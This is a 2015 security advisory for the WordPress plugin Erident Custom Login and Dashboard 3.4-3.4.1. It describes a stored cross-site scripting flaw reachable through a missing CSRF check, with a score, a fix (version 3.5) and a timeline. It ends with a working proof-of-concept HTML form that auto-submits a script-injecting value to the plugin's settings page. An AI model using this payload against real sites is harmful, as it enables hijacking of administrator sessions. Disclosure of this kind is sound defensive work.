Erident Custom Login and Dashboard 3.4-3.4.1, Persistent XSS
The Erident Custom Login and Dashboard plugin exposes a call to the update_option method, when a specific POST field is posted to the plugins setting screen. No CSRF token is used, and as such if an Administrative user can be tricked into visiting a site with a malicious form, it is possible to trigger a Stored Cross Site Scripting attack in the admin dashboard by utilizing this unsafe method call. The vulnerable method call is located on line 312 of erident-custom-login-and-dashboard/er-custom-login.php.
Homepage
https://wordpress.org/plugins/erident-custom-login-and-dashboard/
CVSS Score
3.5
CSSS Vector
(AV:N/AC:M/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 3.5.
Proof of Concept
<form id="form" method="POST" target="http://localhost/wp-admin/options-general.php?page=erident-custom-login-and-dashboard">
<input type="hidden" name="er_options_up[dashboard_data_left]" value="Powered by YourWebsiteName<script>alert(1)</script>"/>
</form>
<script>document.getElementById("form").submit();</script>
Timeline
- 2015-05-11: Discovered
- 2015-05-11: Vendor notified
- 2015-05-11: Vendor responded
- 2015-06-11: Version 3.5 released – issue resolved
- 2015-06-18: Advisory released